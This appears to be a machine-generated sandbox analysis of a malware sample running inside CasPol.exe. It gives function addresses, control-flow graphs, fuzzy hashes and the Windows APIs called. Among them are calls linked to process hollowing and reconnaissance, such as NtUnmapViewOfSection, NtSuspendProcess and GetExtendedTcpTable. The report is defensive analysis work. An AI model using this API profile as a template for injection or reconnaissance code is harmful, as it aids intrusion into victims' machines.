                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                              • API String ID: 384173800-625181639
                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                                              Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 162 442554-442560 call 447973 165 442582-44258e call 4425d9 ExitProcess 162->165 166 442562-442570 GetPEB 162->166 166->165 167 442572-44257c GetCurrentProcess TerminateProcess 166->167 167->165
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                                                                              • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                              Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00433CDC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 00404811
                                                                                                              • closesocket.WS2_32(?), ref: 0040481F
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00404885
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040488A
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040489A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 3658366068-0
                                                                                                              • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                              • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                              Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 22 449950-449969 23 44997f-449984 22->23 24 44996b-44997b call 4453f9 22->24 26 449986-44998e 23->26 27 449991-4499b5 MultiByteToWideChar 23->27 24->23 31 44997d 24->31 26->27 29 449b48-449b5b call 433d2c 27->29 30 4499bb-4499c7 27->30 32 4499c9-4499da 30->32 33 449a1b 30->33 31->23 36 4499dc-4499eb call 455f30 32->36 37 4499f9-449a0a call 446aff 32->37 35 449a1d-449a1f 33->35 39 449a25-449a38 MultiByteToWideChar 35->39 40 449b3d 35->40 36->40 50 4499f1-4499f7 36->50 37->40 47 449a10 37->47 39->40 44 449a3e-449a50 call 44785d 39->44 45 449b3f-449b46 call 4353f9 40->45 52 449a55-449a59 44->52 45->29 51 449a16-449a19 47->51 50->51 51->35 52->40 54 449a5f-449a66 52->54 55 449aa0-449aac 54->55 56 449a68-449a6d 54->56 57 449aae-449abf 55->57 58 449af8 55->58 56->45 59 449a73-449a75 56->59 60 449ac1-449ad0 call 455f30 57->60 61 449ada-449aeb call 446aff 57->61 62 449afa-449afc 58->62 59->40 63 449a7b-449a95 call 44785d 59->63 66 449b36-449b3c call 4353f9 60->66 74 449ad2-449ad8 60->74 61->66 76 449aed 61->76 62->66 67 449afe-449b17 call 44785d 62->67 63->45 78 449a9b 63->78 66->40 67->66 79 449b19-449b20 67->79 80 449af3-449af6 74->80 76->80 78->40 81 449b22-449b23 79->81 82 449b5c-449b62 79->82 80->62 83 449b24-449b34 WideCharToMultiByte 81->83 82->83 83->66 84 449b64-449b6b call 4353f9 83->84 84->45
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                                                              • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                                                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • __freea.LIBCMT ref: 00449B40
                                                                                                              • __freea.LIBCMT ref: 00449B65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3864826663-0
                                                                                                              • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                              • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                              Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                                                                              • _free.LIBCMT ref: 00446F7D
                                                                                                              • _free.LIBCMT ref: 00446FA4
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                              Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 110 447210-447224 111 447226-44722f 110->111 112 447231-44724c LoadLibraryExW 110->112 113 447288-44728a 111->113 114 447275-44727b 112->114 115 44724e-447257 GetLastError 112->115 118 447284 114->118 119 44727d-44727e FreeLibrary 114->119 116 447266 115->116 117 447259-447264 LoadLibraryExW 115->117 121 447268-44726a 116->121 117->121 120 447286-447287 118->120 119->118 120->113 121->114 122 44726c-447273 121->122 122->120
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                              • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                              Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 123 44db34-44db68 GetCPInfo 124 44dc5e-44dc6b 123->124 125 44db6e 123->125 126 44dc71-44dc81 124->126 127 44db70-44db7a 125->127 128 44dc83-44dc8b 126->128 129 44dc8d-44dc94 126->129 127->127 130 44db7c-44db8f 127->130 131 44dca0-44dca2 128->131 132 44dca4 129->132 133 44dc96-44dc9d 129->133 134 44dbb0-44dbb2 130->134 137 44dca6-44dcb5 131->137 132->137 133->131 135 44dbb4-44dbeb call 44fed3 call 449b6d 134->135 136 44db91-44db98 134->136 148 44dbf0-44dc1b call 449b6d 135->148 140 44dba7-44dba9 136->140 137->126 139 44dcb7-44dcc7 call 433d2c 137->139 141 44db9a-44db9c 140->141 142 44dbab-44dbae 140->142 141->142 147 44db9e-44dba6 141->147 142->134 147->140 151 44dc1d-44dc27 148->151 152 44dc37-44dc39 151->152 153 44dc29-44dc35 151->153 155 44dc50 152->155 156 44dc3b-44dc40 152->156 154 44dc47-44dc4e 153->154 157 44dc57-44dc5a 154->157 155->157 156->154 157->151 158 44dc5c 157->158 158->139
                                                                                                              APIs
                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Info
                                                                                                              • String ID: $fD
                                                                                                              • API String ID: 1807457897-3092946448
                                                                                                              • Opcode ID: 087e75d6d0c5dfc266f8d0db6dc2d9c8bdf64c075b99d56c4e0ad6347b3f9d1b
                                                                                                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                              • Opcode Fuzzy Hash: 087e75d6d0c5dfc266f8d0db6dc2d9c8bdf64c075b99d56c4e0ad6347b3f9d1b
                                                                                                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                              Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 159 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                              APIs
                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                              • String ID: (CG
                                                                                                              • API String ID: 1925916568-4210230975
                                                                                                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                              Function 0044785D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 170 44785d-44787f call 447174 172 447884-44788b 170->172 173 4478b4-4478ce call 4478e5 LCMapStringW 172->173 174 44788d-4478b2 172->174 178 4478d4-4478e2 call 433d2c 173->178 174->178
                                                                                                              APIs
                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 004478CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: String
                                                                                                              • String ID: LCMapStringEx
                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                              • Opcode ID: bfa8507c05aaf59a1b65123d696e4265d6ae70caa07f5ecb030579337eb990e7
                                                                                                              • Instruction ID: 749e071dddadb0611b3357a2cf1c840dd35b3db394ad94bf3c266594d1e105ea
                                                                                                              • Opcode Fuzzy Hash: bfa8507c05aaf59a1b65123d696e4265d6ae70caa07f5ecb030579337eb990e7
                                                                                                              • Instruction Fuzzy Hash: D4012932504209FBDF12AF90DC06EEE7F62EF09755F008165FE0865161C7369971EB99
                                                                                                              Function 004473BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 182 4473ba-4473dc call 447174 184 4473e1-4473e8 182->184 185 4473f9 TlsAlloc 184->185 186 4473ea-4473f7 184->186 187 4473ff-44740d call 433d2c 185->187 186->187
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Alloc
                                                                                                              • String ID: FlsAlloc
                                                                                                              • API String ID: 2773662609-671089009
                                                                                                              • Opcode ID: eb9744b0f99d01425a23a469579f78c82d33e3ecb83b5d68344d66ff2f79c789
                                                                                                              • Instruction ID: 24f66c7253cb77c9f437760898e342ee7dcb6335a46030aa2dd544025cc123c2
                                                                                                              • Opcode Fuzzy Hash: eb9744b0f99d01425a23a469579f78c82d33e3ecb83b5d68344d66ff2f79c789
                                                                                                              • Instruction Fuzzy Hash: B8E05530A8420AA7D214AF20AC03A2EFB54CF04762F0005AAFC0493342CE388E01D1DE
                                                                                                              Function 00438E57 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 192 438e57-438e6c call 438de8 194 438e71-438e78 192->194 195 438e8a-438e8c TlsAlloc 194->195 196 438e7a-438e89 194->196
                                                                                                              APIs
                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00438E6C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: try_get_function
                                                                                                              • String ID: FlsAlloc
                                                                                                              • API String ID: 2742660187-671089009
                                                                                                              • Opcode ID: b1cba7f0218e917ff68914ef6add9c5828cf048b7d115dedf5b4937681f64105
                                                                                                              • Instruction ID: a0307b958b0d3629ed7144d0bc7264abd5bab77eff0b6699954acb4a337da6a1
                                                                                                              • Opcode Fuzzy Hash: b1cba7f0218e917ff68914ef6add9c5828cf048b7d115dedf5b4937681f64105
                                                                                                              • Instruction Fuzzy Hash: 5ED0C231684338A3C1002684AC02B9ABF049B00FB3F0505B7FD08A12938D6A5810A6CE
                                                                                                              Function 0044DE89 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 199 44de89-44dead call 44da5c 202 44debd-44dec4 199->202 203 44deaf-44deb8 call 44dacf 199->203 205 44dec7-44decd 202->205 210 44e06a-44e079 call 433d2c 203->210 207 44ded3-44dedf 205->207 208 44dfbd-44dfdc call 436050 205->208 207->205 211 44dee1-44dee7 207->211 217 44dfdf-44dfe4 208->217 214 44dfb5-44dfb8 211->214 215 44deed-44def3 211->215 216 44e069 214->216 215->214 219 44def9-44df05 IsValidCodePage 215->219 216->210 220 44dfe6-44dfeb 217->220 221 44e01b-44e025 217->221 219->214 222 44df0b-44df18 GetCPInfo 219->222 223 44dfed-44dff3 220->223 224 44e018 220->224 221->217 227 44e027-44e04e call 44da1e 221->227 225 44dfa2-44dfa8 222->225 226 44df1e-44df3f call 436050 222->226 228 44e00c-44e00e 223->228 224->221 225->214 229 44dfaa-44dfb0 call 44dacf 225->229 240 44df41-44df48 226->240 241 44df92 226->241 237 44e04f-44e05e 227->237 232 44dff5-44dffb 228->232 233 44e010-44e016 228->233 242 44e066-44e067 229->242 232->233 238 44dffd-44e008 232->238 233->220 233->224 237->237 245 44e060-44e061 call 44db34 237->245 238->228 243 44df4a-44df4f 240->243 244 44df6b-44df6e 240->244 246 44df95-44df9d 241->246 242->216 243->244 247 44df51-44df57 243->247 249 44df73-44df7a 244->249 245->242 246->245 250 44df5f-44df61 247->250 249->249 251 44df7c-44df90 call 44da1e 249->251 252 44df63-44df69 250->252 253 44df59-44df5e 250->253 251->246 252->243 252->244 253->250
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044DA5C: GetOEMCP.KERNEL32(00000000,?,?,0044DCE5,?), ref: 0044DA87
                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044DD2A,?,00000000), ref: 0044DEFD
                                                                                                              • GetCPInfo.KERNEL32(00000000,0044DD2A,?,?,?,0044DD2A,?,00000000), ref: 0044DF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CodeInfoPageValid
                                                                                                              • String ID:
                                                                                                              • API String ID: 546120528-0
                                                                                                              • Opcode ID: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                                                                              • Instruction ID: df262af5b8aedb6acfa17e1c9bcd504f5ccc85cb1eacd95bde0bd7f7b44a6e87
                                                                                                              • Opcode Fuzzy Hash: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                                                                              • Instruction Fuzzy Hash: C2513370D042059EFB348F72C8856BBBBA5AF41304F14446FD0978B252D67DA94ACB99
                                                                                                              Function 0044DCC8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 256 44dcc8-44dcf2 call 446ebf call 44dde7 call 44da5c 263 44dcf4-44dcf6 256->263 264 44dcf8-44dd0d call 446aff 256->264 265 44dd4b-44dd4e 263->265 268 44dd3d 264->268 269 44dd0f-44dd25 call 44de89 264->269 271 44dd3f-44dd4a call 446ac5 268->271 272 44dd2a-44dd30 269->272 271->265 274 44dd32-44dd37 call 445354 272->274 275 44dd4f-44dd53 272->275 274->268 277 44dd55 call 4438b6 275->277 278 44dd5a-44dd65 275->278 277->278 281 44dd67-44dd71 278->281 282 44dd7c-44dd96 278->282 281->282 284 44dd73-44dd7b call 446ac5 281->284 282->271 285 44dd98-44dd9f 282->285 284->282 285->271 287 44dda1-44ddb8 call 44d932 285->287 287->271 291 44ddba-44ddc4 287->291 291->271
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 0044DDE7: _abort.LIBCMT ref: 0044DE19
                                                                                                                • Part of subcall function 0044DDE7: _free.LIBCMT ref: 0044DE4D
                                                                                                                • Part of subcall function 0044DA5C: GetOEMCP.KERNEL32(00000000,?,?,0044DCE5,?), ref: 0044DA87
                                                                                                              • _free.LIBCMT ref: 0044DD40
                                                                                                              • _free.LIBCMT ref: 0044DD76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 2991157371-0
                                                                                                              • Opcode ID: 1c1e601d523f09ffc5791c958070a32dbad2633fea9a1d512da203678c683477
                                                                                                              • Instruction ID: 78e98af2e08dba5698695eadbe882f177ccac690bbf417dcf661007a8bbce0b0
                                                                                                              • Opcode Fuzzy Hash: 1c1e601d523f09ffc5791c958070a32dbad2633fea9a1d512da203678c683477
                                                                                                              • Instruction Fuzzy Hash: CE31E4B1D04108AFFB14EF69D441B9A77F4DF41324F25409FE9049B2A2EB799D41CB58
                                                                                                              Function 00447174 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 292 447174-44719e 293 4471a0-4471a2 292->293 294 447209 292->294 295 4471a4-4471a6 293->295 296 4471a8-4471ae 293->296 297 44720b-44720f 294->297 295->297 298 4471b0-4471b2 call 447210 296->298 299 4471ca 296->299 304 4471b7-4471ba 298->304 300 4471cc-4471ce 299->300 302 4471d0-4471de GetProcAddress 300->302 303 4471f9-447207 300->303 307 4471e0-4471e9 call 4333a7 302->307 308 4471f3 302->308 303->294 305 4471bc-4471c2 304->305 306 4471eb-4471f1 304->306 305->298 309 4471c4 305->309 306->300 307->295 308->303 309->299
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91,00000000), ref: 004471D4
                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2279764990-0
